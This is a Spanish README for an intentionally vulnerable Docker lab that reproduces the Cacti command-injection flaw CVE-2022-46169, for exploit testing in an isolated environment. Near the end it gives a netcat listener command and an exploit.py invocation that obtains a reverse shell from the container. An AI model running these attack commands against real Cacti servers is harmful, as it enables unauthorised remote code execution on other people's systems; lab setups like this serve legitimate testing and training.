
ADVERTENCIA: Esta es una aplicación vulnerable para probar el exploit de la inyección de comandos de Cacti (CVE-2022-46169). ¡Úsala bajo tu propio riesgo!
Esta es una aplicación vulnerable para probar el exploit de la vulnerabilidad Cacti (CVE-2022-46169).
Esta aplicación contiene vulnerabilidades de seguridad graves. ¡Úsela bajo su propio riesgo! Se recomienda utilizar un entorno respaldado y aislado (como una VM con una instantánea reciente y red solo anfitrión). No suba esta aplicación a ningún servidor expuesto a Internet, ya que se verá comprometido.
DESCARGO DE RESPONSABILIDAD: No me hago responsable del uso que cualquier persona haga de esta aplicación. El único propósito de esta aplicación es ser un escenario de prueba para el exploit CVE-2022-46169 y no debe utilizarse con fines malintencionados. Si su servidor se ve comprometido mediante una instalación de esta aplicación, no es mi responsabilidad, sino de la(s) persona(s) que la subieron e instalaron.
Estos son los pasos para configurar el entorno:
docker compose up -d para iniciar la composición.admin/admin.El contenedor se llamará vuln-cacti.
Para eliminar el entorno, use el comando docker compose down.
La guía de instalación oficial de Cacti se puede encontrar aquí.
Una causa raíz detallada de la vulnerabilidad está disponible aquí.
Un exploit público está disponible en Exploit-DB. Se ha copiado en la carpeta exploit/ para mayor simplicidad.
Para ejecutarlo:
nc -lvp 6669
./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
host.docker.internal se usa para alcanzar la máquina anfitriona desde el contenedor (referencia).También hay una entrada en el repositorio vulhub.
Este proyecto está licenciado bajo la Unlicense; consulte el archivo LICENSE para obtener más detalles.